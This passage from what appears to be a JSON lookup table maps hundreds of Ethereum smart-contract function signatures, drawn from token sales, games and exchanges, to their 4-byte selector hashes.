"destroyCard(uint256,uint16)": "0x4ad37241", "changeCardAttr(uint256,uint16[5],uint16[5],uint16)": "0x19902b40", "createCard(address,uint16[5],uint16)": "0x566e638e", "PortToken()": "0x53749313", "EKKChain()": "0x3b5f30db", "ISCToken()": "0x631121ca", "canTransferFrom(address,address)": "0x073005f1", "balanceOfReadable(address)": "0x9117c6df", "assignRevenue(uint256)": "0x2978b826", "setMinRevenue(uint256)": "0xda257cb4", "createBalanceSnapshot()": "0xd8152cbc", "setRevenueContract(address)": "0x498a6de7", "_getTokenBonus(uint256)": "0x72e5c84f", "_validateMaxSellAmount(uint256)": "0x39d2036d", "returnBonus()": "0x35735226", "deliverBonus()": "0x0cadc5b3", "returnToken()": "0x2e4a3657", "privateCrowdsale(address,uint256)": "0x044c9366", "_addBonus(address,uint256)": "0xd289f187", "Bolivar()": "0x09f580b0", "SuperCoinViewToken()": "0x72dad9f9", "setCrowdsaleOpen(bool)": "0xfeda38bc", "lockRemainingTokens()": "0x028a95a0", "ART1(address)": "0xb67a77dd", "PALToken8(uint256,address)": "0x41c46ff7", "letItRain(address[],uint256[])": "0xd8267fef", "SAWJewelleryChain()": "0xd9740383", "HerbsChainToken()": "0x9b6ec1cb", "changeReferrer(address)": "0xbd97ce3a", "changeReferral(address)": "0x969295ae", "ReferralContract(address,address,address)": "0xada1f3ad", "newToken(string,string,uint256)": "0xacbc272b", "Devilsbest()": "0xc0b3dab3", "STLHToken(string,string,uint8,uint256)": "0x97ec72b8", "SOT()": "0x026f9d56", "migrateAll(uint256[])": "0x8e7e879f", "burnCount()": "0x524773ce", "addPack(address)": "0x821f830f", "transferAllFrom(address,address,uint256[])": "0x0bbe0ee3", "getActiveCards()": "0x3cb4ff3c", "addNewTokenTo(address,uint256)": "0x9e1bf732", "getOrderString()": "0x6e3aff90", "setWaitingTimeBuffer(uint256)": "0xe90389bd", "queryWaitingTimeBuffer()": "0xf5cb0daa", "queryWaitingTime()": "0xf94e08d0", "nextReward()": "0x6da4fe26", "requestReward()": "0x4cecac6d", "AmateurPlatinumToken()": "0x6b2c116c", "EVCChain()": "0xbc77f476", "LoritaBi()": "0x8eb6418e", "createVestingContractWithFloatingPercent(address,uint256,uint256,address,uint256[])": "0x824d84d5", "createVestingContractWithConstantPercent(address,uint256,uint256,address,uint256)": "0xd561be54", "startVesting()": "0xdeb36e32", "revertTokens(address,address)": "0x3cf43e08", "CryptoLinkNet()": "0x7a58ce90", "claimPheonix(address)": "0xf88218e0", "approvePack(address)": "0x563b1358", "makeTradable(uint8)": "0xf5f23b52", "CTB(uint256,string,string)": "0x7dfe1674", "MMOToken()": "0x688def07", "ABCDToken()": "0x9f0e591b", "userXRTBalance(address)": "0xefd8c379", "sendResidualAmount(uint256)": "0xa1fafe0c", "HHDCToken(uint256,string,string)": "0x0b424b66", "COSTToken()": "0xc76f0d13", "ZTST()": "0x1442b548", "decreaseApprovalWithData(address,uint256,bytes)": "0x4624321e", "setPonziPriceinWei(uint256)": "0xf7c9f1da", "currentDelayOnNewLevel()": "0x2e56fd7a", "totalPonziInGame()": "0xadec3a92", "levelStartupTimestamp()": "0x1609e43b", "level()": "0x6fd5ae15", "compoundingFreq()": "0x4c95baf3", "enter(uint256,address)": "0xea3b9ba1", "playerDelayOnExit(address)": "0x8d0aadca", "playerOutputAtNow(address)": "0xc3082e95", "TheGame(address)": "0x1e9d8232", "playerSetInput(address,uint256)": "0xa0b1b385", "playerTimestamp(address)": "0x20e9aac3", "playerExist(address)": "0xfff07241", "playerInput(address)": "0x2d8aa855", "deletePlayer(address)": "0x12243b67", "newPlayer(address,uint256,uint256)": "0x3dd83fe1", "PlayersStorage()": "0x757be78e", "bulkMint(address[],uint256[])": "0x6ae459bd", "TeamTokenDistribution(address)": "0x26facdb1", "extraMint()": "0xd862b611", "openTransfer()": "0xaf24d25c", "mintlist(address[],uint256[])": "0x60fd0e91", "RootsToken()": "0xb16d0839", "TRNCoin()": "0x3226a94e", "JustAnIndex1()": "0x175f6d9c", "setTokenOffering(address,uint256)": "0x726f63f6", "ForestingToken(address)": "0xcfc9cb7f", "setPeriod(uint256[])": "0x14363e65", "FCCToken(string,string,uint256,uint256,bool)": "0xc148e20e", "receivedTokenOf(address)": "0xa2ea771f", "investedCrowdsaleTokenOf(address)": "0xdff114dd", "transferedTokenOf(address)": "0x522567c8", "INTARO()": "0x15deaa3f", "DMCTCoin()": "0x5f3292d7", "changeFeeOwner(address)": "0x84465fa5", "ElectriumToken(uint256,string,uint8,string)": "0xe8107ed4", "TACOS()": "0xea46d7b9", "CABtoken()": "0x013512e3", "PlexCoin(uint256,string,uint8,string)": "0xd8c2c878", "BCE()": "0xa2b7a18b", "voteFor(address,uint256)": "0x24d6d601", "getTokenAmount(uint256,uint256)": "0x0bc1236e", "NSCToken()": "0x4c387d82", "contributeDelegated(address,uint256)": "0x751c4d70", "transferDelegated(address,address,uint256)": "0xa4e3374b", "getPrefixedHash(address)": "0xeb5a7033", "delegation(address)": "0xeed50a32", "unDelegate(uint8,bytes32,bytes32)": "0x090cebff", "delegate(uint8,bytes32,bytes32)": "0x3f55b895", "MiracleTeleToken(uint256)": "0xe242df57", "transferSignership(address)": "0x645ac00b", "ConsultaRegistro(bytes32)": "0x570d31b7", "GuardaRegistro(bytes32)": "0xc9819d1e", "HexelErc20Token(string,string)": "0x0f37fd4a", "CrowdSalePreICO()": "0xd71d3b3c", "setNextPrice(uint256,uint256)": "0xda6babca", "setNextMilestone(uint256,uint256)": "0xf0086703", "changeBonus(uint256,uint256,uint256)": "0xa39db022", "setNextPeriod(uint256,uint256)": "0x1fc5c9b7", "RetailSale(address,address,address,uint256,uint256,uint256,uint256)": "0x2fe45a8d", "setBTBAddress(string)": "0xf3d38a7b", "BTBToken()": "0x2d021624", "PotaosBucks()": "0x3210318e", "ShellToken(uint256,string,uint8,string)": "0x2f16753c", "Nova()": "0x1bb63d0c", "APC()": "0x85a227fd", "DiatomAirdrop(address,address)": "0x329f5b21", "TosTeamLockContract()": "0x805f4cfc", "lockBalanceOf(address)": "0x10e776ed", "ClaimOrichalcum()": "0xe2313d1f", "claimStupidFluffyPink(uint64)": "0x43bc867e", "claimPlatinum(uint64)": "0x119f1edb", "claimGold(uint64,uint64,uint64,uint64)": "0x912c8b75", "claimSilver(uint64,uint64,uint64,uint64,uint64,uint64)": "0xdbf14295", "claimCardboard(uint64)": "0xdba86ab6", "claim2Ply(uint64,uint64,uint64,uint64)": "0x943fd51c", "claim1Ply(uint64,uint64,uint64,uint64,uint64)": "0x12bb05ff", "getTeamsOnLeaderboard()": "0x2cc75331", "getTeamByPosition(uint8)": "0xe87ff056", "getMaxRankingSpots()": "0xb375b95a", "petOnLeaderboard(uint64)": "0x0226a5c9", "angelOnLeaderboard(uint64)": "0xc2f0c083", "verifyPosition(uint8,uint64,uint64,uint64)": "0xcc668524", "switchRankings(uint8,uint64,uint64,uint64,uint64,uint64,uint64)": "0xca0fe751", "newTeamOnEnd(uint64,uint64,uint64)": "0x9d930f02", "addtoLeaderboard(uint64,uint64,uint64)": "0x253f5c38", "startLeaderboard(uint64,uint64,uint64)": "0x66eb50b2", "setMaxRankingSpots(uint8)": "0x278d818c", "LamboToken()": "0xbd23076f", "HitToken(uint256,string,string)": "0xa296fed8", "EthereumCoin()": "0xcae44e83", "Secure()": "0xd27aa18e", "updatePurchaseSize(uint256)": "0x4f046439", "updateMaxCap(uint256)": "0xe81ba080", "maxCapNotReached()": "0x6a9ba3ce", "validPurchaseSize(address)": "0x388a74ab", "FundRequestPublicSeed(uint256,uint256,address)": "0x8750367e", "allowWhiteList()": "0x5b387273", "allowEveryone()": "0x26325bd3", "HonestisnetworkICOregulations()": "0x3ab8ee2f", "finalizeReclaim()": "0xde4b45fa", "beginReclaim()": "0x6a3c62a7", "DeadMansSwitch(address,address,uint256)": "0x5aa63592", "BRLTOKEN()": "0x71a009ad", "exchange(uint256,address)": "0x0fe2abcf", "Token2GB(address)": "0xbbb44989", "addContractAddress(address)": "0xb11ce2db", "exchangeToken(uint256,address,address)": "0x96a34fc7", "changeEth_to_usd(uint256)": "0xe13044fb", "transferBack(uint256,address,address)": "0xc745ca9a", "transferIfTokenAvailable(uint256,uint256,address)": "0x2d28d4cf", "transferManually(uint256,address,address)": "0xec7380d9", "checkAndUpdateTokenForManual(uint256)": "0x38cb583d", "validPurchaseForManual()": "0xf8ccbd38", "freeze(address[],bool)": "0xe2dc7763", "closeDistribution(bool)": "0xbe4a7160", "UBlockChain(address)": "0x9830aa07", "SmartIndustrialToken()": "0x59242d11", "CRVToken()": "0x217f2d23", "amIBeneficiary(address)": "0x15e3187d", "getAirdropAtSnapshot(address)": "0xdb78d0ce", "getBalanceAtSnapshot(address)": "0xcd5406e4", "flushTokens()": "0xc4e85b63", "changeCurrentCirculating(uint256)": "0x61cec717", "changeAirdropLimit(uint256)": "0xb0bfe169", "airdropAndBurn()": "0x4ff57e9f", "takeSnapshot()": "0xb3d3d37e", "addBeneficiary(address)": "0x5926651d", "registerBeneficiaries(address[])": "0x14d47bc9", "registerBeneficiary(address)": "0xcdd8b2b2", "Airdrop(address,uint256,uint256,address)": "0xada791f9", "DAEXToken(address)": "0x0c367f63", "initialise(address,uint256,uint256,uint256,uint256,uint256)": "0x8410956a", "LTKN()": "0xaa8e8fb0", "Inbox(string)": "0xd4a8d9ba", "batchTransfer(address,address[],uint256[])": "0x1239ec8c", "batchTransferFixedAmount(address,address[],uint256)": "0xf9889f78", "FrescoToken()": "0x8244208c", "WorldTrade(uint256,string,string)": "0x0ad80f41", "setSaleAddress(address,address)": "0x106fd2d5", "getGameIdsByCategory(bytes32)": "0xa695cacf", "getBetsByCategory(bytes32)": "0x7c9d8bdb", "createBet(bytes32,bytes32,uint256,uint8,uint16,uint16,uint16,uint8,uint256,uint8)": "0x7789fc90", "closeBet()": "0xeaa968cc", "manualCloseBet(uint16,uint16)": "0x7b55f66e", "getWinChoice(uint256,uint256)": "0xc94727f0", "rechargeDeposit()": "0xc6e715e1", "updateAmountOfEachChoice(uint256,uint256)": "0x341ceb42", "isSolvent(uint256,uint256)": "0x6f93638e", "checkPlayerExists(address)": "0x4081d916", "getRefundTxFee()": "0xa9a29afa", "getBetResult()": "0x3f3a279d", "getBetMutableData()": "0x4e2bdfd4", "getBetInfo()": "0xcfe7b770", "Bet(address,bytes32,bytes32,uint256,uint8,uint16,uint16,uint16,uint8,uint256,uint8,address)": "0x99cbc1b9", "dataCenterGetResult(bytes32)": "0x6ed4d0c7", "getNetworkName()": "0x94074b03", "setNetworkName(string)": "0xc0cad302", "setNetwork()": "0xa33f3939", "ZEEX()": "0x175c8640", "generatePartnerTokens(uint256)": "0x1ea82655", "generateLockedTokens(uint256)": "0x37689317", "buyTokensOnInvestorBehalfBatch(address[],uint256[])": "0xbc54a168", "buyTokensOnInvestorBehalf(address,uint256)": "0xcb7e70fa", "currentStageIndex()": "0x38fa4029", "getStageTokenAmount(uint256,uint8)": "0x8c72d4a4", "getPreSaleTokenAmount(uint256)": "0xf3998918", "EntryToken()": "0xa9ea4aaa", "NFF()": "0x12a06c35", "ArnoldCoin()": "0x730a04fd", "transferRemaining(address,address,uint256)": "0x973069f8", "buyRareItem(address,uint256,uint256)": "0x64c37043", "buyUpgradeCard(address,uint256,uint256)": "0x760e2cf3", "buyPLATCards(address,uint256,uint256,uint256)": "0x13776ba1", "setBitGuildToken(address)": "0x727b4276", "getRarePLATInfo(uint256)": "0x82a86cda", "getRareItemsPLATPrice(uint256)": "0x104a5e75", "changeSellPriceForAthlete(uint256,uint256)": "0x83bebcc2", "changeOriginWalletIdForAthlete(uint256,address)": "0xedc7d4ab", "createOfAthleteCard(string,address,uint256,uint256,uint256)": "0xdef843ef", "AthleteToken()": "0x206369fa", "createPadlock(string)": "0xb3477201", "EthernalLoveParent()": "0xff8ee507", "DigitalPadlock(string)": "0xd0f96f6b", "initTokenSale(address,address,address,uint256,uint256,uint256)": "0x2d54ab45", "BlockStackCoin()": "0x83ec0648", "setBurnPolicy(bool,bool)": "0x02a8a406", "CoinBundleToken()": "0x9c2f88fa", "listRecords()": "0x6fdcc8a9", "Ranking()": "0xdcc76a92", "PonziRevolutionBeam()": "0x2d042a7f", "ZIBToken(uint256,string,string)": "0x0c0cde7c", "take()": "0x159090bd", "putHere()": "0x5c3c8c87", "Hack()": "0x983e1318", "CAF1(address)": "0x7ce7d660", "setChargeFeePool(address)": "0x46b753a2", "setChargeFee(uint256)": "0x516ae993", "setMonthWithdraw(uint256)": "0xeec809ff", "setDayWithdrawCount(uint256)": "0xd8df9aad", "dxfOpen()": "0x79c63c40", "donationMultiplier()": "0xb3c1fe4f", "sumPreICO3()": "0x7617f814", "firstStageStartsAt()": "0x6861d3b8", "thirdWeekBonus()": "0x91125fb7", "transferableFromBlock()": "0xc78b200c", "ICOcontributors()": "0xec0f60d9", "payableEnabled()": "0xa8c89c5b", "createFirstRound()": "0x70c8f8ad", "purchaseEnable()": "0x91a49300", "LAMDEN_DECIMALS()": "0xcb12fc1d", "lottoLowestNumber()": "0xe106fae9", "MTUV1()": "0x0c3a9658", "reservationSupply()": "0xf363449f", "supportFreezeQuorum()": "0x70606cda", "ETHER_MIN_CONTRIB_USA()": "0xa3223d50", "ADDITIONAL_BONUS_NUM()": "0xb0d3a396", "endEarlyStage3()": "0x21f610d3", "firstDepositTimestamp()": "0x62469353", "restrictedTokens()": "0x73bda17e", "thirdRate()": "0x8d55b6ac", "leader()": "0x40eedabb", "indexBalance()": "0x0313953d", "YUPIE_PER_ETH_PRE_SALE()": "0x62a1029c", "purchasedTokensRaised()": "0x4d5e58a4", "rap()": "0xecd08bc3", "periodPreITO_wei()": "0x8d8833bf", "masterServer()": "0x911402f1", "betLastTime()": "0xb5c19d59", "GenesisSalesPriceCount()": "0x4349168e", "multisigAddress()": "0x5462870d", "MAX_FUNDING()": "0x6092019a", "SecretNumber()": "0xc2610cda", "voteStartTime()": "0x18024acc", "START_PRESALE_TIMESTAMP()": "0x22169ab3", "ethMin()": "0x265ffe2b", "ICO_START4()": "0x04819507", "leekStealOn_()": "0x6adf3279", "minCapUSD()": "0xded317a8", "NorthPoleMintingEnabled()": "0x4e55936d", "tradesCount()": "0x5932c02c", "BONUS_ICO_WEEK_ONE()": "0xcab3ad2c", "TransfersEnabled()": "0xeadb2481", "getNumberOfLogEntries()": "0xf4424cac", "keyEmployeesAllocatedFund()": "0x88e9fb4f", "INITIAL_STAGE()": "0xc7091c5e", "thirdStageTokenRate()": "0xf46bbc09", "ETHERFUNDME_FEE()": "0xeb5230d7", "randomGenerateMethod()": "0xa8f6f1f0", "mEtherInvalid()": "0x0e9ecedd", "m_claimingIsActive()": "0x24a30e46", "additionalTokenRate()": "0xd81849b8", "amountPerRelease()": "0xdd05db9a", "currentRoundId()": "0x9cbe5efd", "fourthWeekBonus()": "0x2ea60e35", "previousStage()": "0x6735a1cc", "bonusTokenThreshold()": "0x9e964025", "channel_deposit_bugbounty_limit()": "0x6108b5ff", "setPresaleMode()": "0xb85e7df1", "MIN_TOTAL_AMOUNT_GET_ETH()": "0xb01eba14", "tokenRate30()": "0x62848f36", "hardcap()": "0xb071cbe6", "BONUS_WINDOW_3_END_TIME()": "0xfb23bbb1", "releaseTokenHolder()": "0xce05369b", "queueCount()": "0x9ef36bd1", "ignoreKYCLockup()": "0x8732d065", "finalAllocation()": "0x6b440e9a", "ASHLEY_ADDRESS()": "0x9a0475e9", "PUBLIC_RESOLVER_LABEL()": "0xc84b1ce7", "crowsaleShare()": "0x7e300fc6", "ownerCEO()": "0xc17c0456", "isStart()": "0x8a55d36e", "ownerTime()": "0x9ca7c912", "referrerBonus()": "0x4bae2ef1", "gcStartTime()": "0x176b0eac", "window2TokenExchangeRate()": "0x2438b674", "presaleEndDate()": "0x9a2e27f8", "minTokensForSale()": "0x517125fa", "minAmountETH()": "0x350a6429", "refundLockDate()": "0xc3500745", "minSumICOStage1USD()": "0x458f837f", "CROSAIR_SHIP_PRICE()": "0x4fd6ff6e", "defaultLockInDuration()": "0xe8297da2", "indSeed()": "0xf7981bdd", "_productDigest()": "0x573f642d", "pitboss()": "0xa026348c", "ico1endTime()": "0x797bfaf3", "angelAddress()": "0x259fefcb", "INFOCORP_DONATION()": "0x982f4a21", "exitAddress()": "0x6be00229", "roundEndTime()": "0xe40205d6", "reserveTimeLock()": "0x598f6dec", "createTokenToMarket2019()": "0x00f45438", "isFundRequestToken()": "0x76dc4c0a", "securityGuard()": "0xb2ca3ec4", "LOCKED_ALLOCATION_PPM()": "0x72b5e050", "weiToCollect()": "0x78fbc9ea", "aelfCommunityMultisig()": "0xf752644c", "futureDevLock()": "0x9d2d912e", "Schengencoin()": "0x5d7e6b8d", "pureBalanceOf(address)": "0xbe494573", "QWoodDAOToken(uint256,uint256,uint256)": "0x09931e00", "listedTokensAsBytes(uint256,uint256)": "0x5c3dcfde", "HeroesToken()": "0x261669ba", "DGAMEToken()": "0x7d1173b0", "DetailedERC20(uint256,string,string,uint8)": "0xda8f9fe5", "ComeCoin()": "0x59b119dc", "saleIsOn()": "0x4b4f90ef", "switchSale()": "0x5322f9d1", "addPayment(string,address,string,uint256,uint256)": "0xfeaceab4", "paymentManager(string,address,string,uint256,uint256)": "0xae6b0792", "setId()": "0x087e926c", "withBonus(uint256,uint256)": "0xaf6df563", "paymentController(address,uint256)": "0x0922e596", "countBonus(uint256)": "0x0e234cd4", "confirmSell(uint256)": "0xdd92a8b0", "updateCrowd(uint256,uint256,uint256,uint8)": "0x2e6f456c", "startCrowdsale(uint256,uint256,uint256,uint8)": "0x86b27391", "CustomcoinCrowdsale(address)": "0x00d357d1", "Customcoin()": "0xd647bb22", "ownerRefundUser(bytes32,address,uint256,uint256)": "0x5f0e3855", "userGetPendingTxByAddress(address,address)": "0x50d491ab", "userWithdrawPendingTransactions()": "0xf5bea782", "userRollDice(uint256)": "0x1b9900b8", "generateRandomNum()": "0x7cbb6934", "TouristToken()": "0x995a15a8", "DYC(uint256,string,string)": "0xeaf16303", "MYR_Omnidollar()": "0xe88b9436", "setupCutie(uint40,uint16)": "0xdf1b817e", "PlatoniusToken()": "0xabbf94f8", "DigitalTicks()": "0x2f347e48", "CecCoin()": "0x2c899ab6", "sumDepth(uint128)": "0xbe40887d", "walkBook(uint16)": "0x03adcbd2", "enterOrder(uint128)": "0x24932186", "matchWithTheirs(uint256,uint128,uint16)": "0x48f6647b", "matchAgainstBook(uint128,uint256,uint256,uint256)": "0x45beb6e0", "processOrder(uint128,uint256)": "0x3aa6608e", "creditExecutedFundsLessFees(uint128,uint256,uint256)": "0xdc1bebe6", "removeOpenOrderFromBook(uint128)": "0x15902a09", "continueOrder(uint128,uint256)": "0xbd5acbd6", "cancelOrder(uint128)": "0xdbc91396", "computeCntrAmountUsingPacked(uint256,uint16)": "0xc3a25c4c", "computeCntrAmountUsingUnpacked(uint256,uint16,int8)": "0xdcc819c8", "computeOppositePrice(uint16)": "0xb8598f9e", "isBuyPrice(uint16)": "0xe2c2ae5a", "unpackPrice(uint16)": "0x1149f736", "walkClientOrders(address,uint128,uint128)": "0xa87d8b6b", "getOrderState(uint128)": "0x31f9a211", "getOrder(uint128)": "0x117d4128", "transferRwrd(uint256)": "0x4dc7d31b", "transferFromRwrd()": "0x929ba8bf", "withdrawCntr(uint256)": "0x199f0791", "depositCntr()": "0x60445142", "transferBase(uint256)": "0x3c13fc33", "transferFromBase()": "0x61ea6ed7", "getClientBalances(address)": "0x6f03e4f9", "getBookInfo()": "0x22ea2d96", "changeFeeCollector(address)": "0x9245290d", "BookERC20EthV1()": "0x17011011", "_createPoo(string,address,uint256)": "0xa9e2e084", "_increaseWinPotChance()": "0x35a53379", "_checkToiletFlush(bool,uint256)": "0x730c635a", "tryFlush()": "0x957f9a0b", "getRoundDetails()": "0x9a68323c", "getPoo(uint256)": "0xc8f288ad", "createContractPoo(string)": "0x22c61e73", "CryptoPoosToken()": "0x5f5d867b", "BAIRON()": "0xb2741997", "OmVPNToken()": "0xe2fd3c08", "RabbitCore(string,string)": "0x82ef6483", "uint5ToStr(uint256[5])": "0x607d35c4", "uint2ToStr(uint256[2])": "0xc3ea901d", "verify(string,uint8,bytes32,bytes32)": "0x609f8fe2", "setRabbitData(uint256,uint32,uint32,uint32,uint256,uint8,bytes32,bytes32)": "0x39b3fba8", "getFreeRabbit(uint32,uint256,uint8,bytes32,bytes32)": "0xd8cb52d3", "transferOnError(address,uint256)": "0x658fbfbc", "_cancelAuction(uint256)": "0x25583590", "cancelAuctionByMaster(uint256)": "0x75d91db8", "getAuctionData(uint256)": "0x44f27e30", "buyBox2()": "0x935b2b1f", "buyBox1()": "0x4aa8e57e", "buyOneRabbit(uint256)": "0xe6b1602f", "_createRabbitInGrade(uint256,address,uint8)": "0x5cb1470e", "createPromoRabbit(uint256,address)": "0xc89f51ef", "setBaseInfo(uint256,bool,bool)": "0xffd479bb", "isERC721()": "0xd2afa8c1", "getRabbit(uint256)": "0xe6ed6c74", "_createRabbit(uint256,uint256,uint256,uint256,uint256,address,uint8)": "0x6710e801", "_transItem(address,address,uint256)": "0x12dd4763", "isNotContract(address)": "0xc5c8015b", "BACToken(uint256,string,uint8,string)": "0x41ce7f23", "SHARD()": "0x40ebe5bc", "withdrawETH(address)": "0x690d8320", "withdrawERC20(address,address)": "0x9456fbcc", "payFee(uint256,uint256,address,bool)": "0x063db820", "getFeeAmount(uint256,bool)": "0xd0ec057e", "adjustTradeRange(uint256,uint256)": "0x0853e875", "adjustMOTFeeDiscount(uint256)": "0x3a051334", "adjustFee(uint256)": "0xc079c318", "getABaddress(uint256)": "0x58a53130", "checkBalance(uint256[],address)": "0xdcc6131c", "canDeCompose(string)": "0x5254b660", "deCompose(string)": "0xad23fdc3", "canCompose(string,uint256[],address,uint256)": "0x21bc84fd", "compose(string,address,uint256[])": "0x1d9e6c34", "Vix18Coin()": "0xee13e042", "getSignature(address)": "0x277fc0e9", "LjwToken3()": "0x9dc9281b", "Pollen()": "0x033988a1", "noAccountedWithdraw()": "0xe41b1d28", "depositToken(address,uint256,uint256)": "0x99c6d2de", "CoinFast()": "0x5004e7a6", "MagixRecordsCoin()": "0x20033848", "Moneytoken()": "0x81cd4570", "ExchangeGift(string)": "0x857cc1c4", "CheckExchange(string)": "0xae3fc899", "GetPurchaseInfo()": "0x91bbb87b", "BuyGoods(uint32)": "0x2e04d730", "GiveChipGitf()": "0x119669cb", "GenExtWeightList(uint8)": "0xda2b2589", "GenRandom(uint256,uint256)": "0xa68fff3f", "GetPurchaseInfo(address)": "0x15598339", "CheckPurchaseCount(address,uint32)": "0x813a573a", "BuyGoods(address,uint32)": "0x3567d5ef", "GetRealCost(address,uint32)": "0xaf8927c1", "GetGoodsInfo(uint32)": "0x53d797c9", "HasGoods(uint32)": "0x8d30241b", "DelGoods(uint32)": "0xb38de8ce", "AddGoods(uint32,uint32,uint256,uint32,uint32,uint32,uint8,uint8,uint8)": "0x8e01d34b", "AdlasToken()": "0xfa2d7efa", "F0002Token()": "0x1e962e62", "testCount(uint256)": "0xd588b892", "isActionAccount(address)": "0x55d55a76", "isMasterAccount(address)": "0x93b8e90d", "canLogIn(address)": "0x57d6f5f2", "removeAccount(address)": "0xc4740a95", "addActionAccount(address)": "0xd7ba42fc", "addMasterAccount(address)": "0x947aca55", "execute(uint8,bytes32,bytes32,address,address,uint256,bytes,address,uint256)": "0x3c05187b", "deleteFrozenAddresses(address)": "0xec7b8c40", "changeFrozenBalanceAll(uint8)": "0x654286d1", "refundToken(uint256)": "0x17191704", "refundEth(uint256)": "0xdcc6e7ad", "internalExchange(uint256)": "0x951367ad", "exchange(uint256)": "0x53556559", "aliceClaimsDeposit(bytes32,uint256,bytes32,address,address,bytes20)": "0x9899a2c5", "bobClaimsDeposit(bytes32,uint256,bytes32,bytes20,address,address)": "0xeb230b2d", "bobMakesErc20Deposit(bytes32,uint256,address,bytes20,bytes20,address,uint64)": "0x57282b96", "bobMakesEthDeposit(bytes32,address,bytes20,bytes20,uint64)": "0x26e8cd23", "depositContrac(uint256)": "0x46ff7eac", "transferSale(address,uint256,uint256,uint256)": "0x1f8e6fb3", "getLightingWithdraw(address,address,bytes32,bytes32,uint256,uint32)": "0xfc6d0dd0", "lightingTransfer(address,address,address,uint256,uint32,bytes32)": "0xb7adb974", "TES()": "0x9647df97", "HuumanStandardToken(uint256,string,uint8,string)": "0x2c12cc79", "habichnet1()": "0xf0921b80", "Storer()": "0x3dcb66db", "getStatusEventCloseSuccess(bytes16)": "0x9df08a9f", "getStatusEventClosed(bytes16)": "0x258c047e", "getAddressLiquidatePool()": "0xe99ed199", "ALXToken()": "0xee54876e", "addHash()": "0xa19cb5ee", "EtalonGlobalToken()": "0x7195eed2", "NewAppleToken()": "0xe951c35b", "TeTeToken()": "0xd258f2f4", "FourWaySplit(address,address,address,address,address,address,address,address)": "0xecd75c59", "Har(address,address,address,uint256,uint256,uint256)": "0x51a4f7f2", "BitcoinMoon()": "0x01b78b12", "WebPay()": "0x1a1a8da8", "SingularityTest18()": "0xe09cffcf", "requestBuywithETH(address)": "0x25d9ec83", "HSHToken()": "0xf0bbab3b", "k(uint256,uint256)": "0xc2761031", "luckyNumberOfAddress(address)": "0x37354a68", "OpenAddressLottery()": "0x9a1ac4b2", "NotifyMe(address,address,uint256)": "0xa4633704", "getTradeOfferState(uint256)": "0xedbe32c4", "getTradeOfferRecipientItems(uint256)": "0xdb79e673", "getTradeOfferSenderItems(uint256)": "0x59e30226", "getTradeOfferRecipient(uint256)": "0xa0e0c317", "getTradeOfferSender(uint256)": "0x3e262e46", "getUserSentTradeOfferId(address,address)": "0x5f9adf84", "getMySentTradeOfferId()": "0x3c21001d", "getAssetClaimString(uint256)": "0x99ce12c1", "getMyInventory()": "0x27457b3b", "getUserInventory(address,address)": "0xa6dcc834", "setAssetClaimString(uint256,string,string)": "0xb7d5ddc8", "declineTradeOffer(uint256)": "0x4806a0bd", "setAssetOwner(uint256,address)": "0x4f5a4eb9", "acceptTradeOffer(uint256)": "0x5d5b9021", "cancelTradeOffer()": "0x8373ae71", "sendTradeOffer(address,uint256[],uint256[])": "0x24e21cde", "getAssetData(uint256)": "0x7d1108f5", "getAssetOwner(uint256)": "0x8d5802e2", "getAssetEmitter(uint256)": "0x14a5cd29", "removeUserAsset(address,uint256)": "0x7a4cac15", "assign(address,string)": "0x3543b23c", "tokensPreMinted()": "0x1f28c821", "_PLUTOToken()": "0x1b1d6af8", "iterate_valid(uint256)": "0x0adcaddc", "iterate_start()": "0x3209c6de", "contains(string)": "0x6833d54f", "update(string,string,string)": "0x31c3e456", "insert(string,string,string)": "0x2fe99bdc", "getTTTCount()": "0xe6d09529", "getTTTInfo(uint256)": "0xbc98b8b0", "getTTTAddress(string)": "0x62c2b7c8", "updateTitleTransfer(string,string,string)": "0x1667504e", "removeTitleTransfer(string)": "0xe65de3ca", "addTitleTransfer(string,string,string)": "0x9f614b61", "TitleRegistry()": "0xa15348fa", "csvConcat(string,string,string,string)": "0xbbc53086", "getCrowdsalesForUser(address)": "0x11719d7e", "countCrowdsalesForUser(address)": "0x2a2e6ee6", "trackCrowdsale(address)": "0xe885910f", "changeDutchIdxAddr(address)": "0x7d862a7e", "changeMintedCappedIdx(address)": "0x76bd5f3c", "changeAbstractStorage(address)": "0xdf295080", "ImperoITCoin()": "0xa2a206c0", "JusticeTokenV2()": "0x4d05a822", "wDiamond()": "0xeebed750", "setRemainAirdrop(uint256)": "0x55c60500", "setCtuContract(address)": "0xa31ffa30", "closeAirdrop()": "0x16212265", "submit(address)": "0xa1903eab", "batchSubmit(address[])": "0xbe268c3f", "LockMechanismByOwner(address,uint256)": "0xab998660", "subSegmentation(address,uint256,uint256,uint256)": "0x5de910bc", "addSegmentation(address,uint256,uint256,uint256)": "0xed6d969a", "tokensub(address,uint256)": "0x0e1cfd97", "tokenadd(address,uint256)": "0xa5bb9162", "tokenTakeback(address,uint256)": "0xd77849c7", "tokenIssue(address,uint256)": "0x26db3c0a", "tokenRaise(address,uint256)": "0xc12692dc", "ShowSegmentation(address,uint256,uint256)": "0x22305fb7", "initsegmentation(address,uint256,uint256)": "0x90742e52", "getGuestToken()": "0x4d8bd784", "getGuestName()": "0x07b578a0", "bookGuest(string)": "0x2ddd196f", "LongChain()": "0x79d60cdf", "FreedomToken()": "0x80054c5d", "getPresaleRate()": "0x09d256fe", "setPresaleRate(uint256)": "0xf449ffe4", "HiroyukiCoinDark()": "0x0b10bd1b", "lockUpdateTokenAccount(address,bool)": "0xa2eb164d", "transferOwnershipUpdateToken(address)": "0x2e9bbbb8", "MyAddress()": "0x43a78b50", "releaseEnd()": "0x8033fe49", "releaseMid()": "0xbcf6558c", "releaseStart()": "0x766e33f4", "withdraw(uint64,address,address[],bytes32[],address[],uint256[])": "0x9629da17", "_llTransferFrom(address,address,address,uint256)": "0xf67ff0af", "_transferAvailable(address,address,address)": "0xf04aa255", "collect(uint64,address[],address[],address)": "0xfd214edd", "getTotalWithdrawn(uint64,address)": "0xe63c83c1", "getTotalCollectedFrom(uint64,address,address)": "0xaa2a1c47", "getTotalCollected(uint64,address)": "0xcd76aa16", "fire(uint64,address[])": "0x293f4825", "hire(uint64,address[])": "0x19f30aaa", "abdicate(uint64,address)": "0xd5fec406", "register(address,address[])": "0xa5b2235d", "TESTBRB()": "0xe6138b37", "sendToken(uint256,uint256,uint256,string)": "0x8f77339f", "getLastPendingTransaction()": "0x046e85f9", "getTransactionListLength()": "0x3567d637", "setTokenInfo(string,address,address)": "0x521fba45", "getOraclizeFee()": "0xcc3eacbb", "TressexToken()": "0x61c748c7", "GetOwnerAddress()": "0xe6f7bf89", "GetGuestTokenNo()": 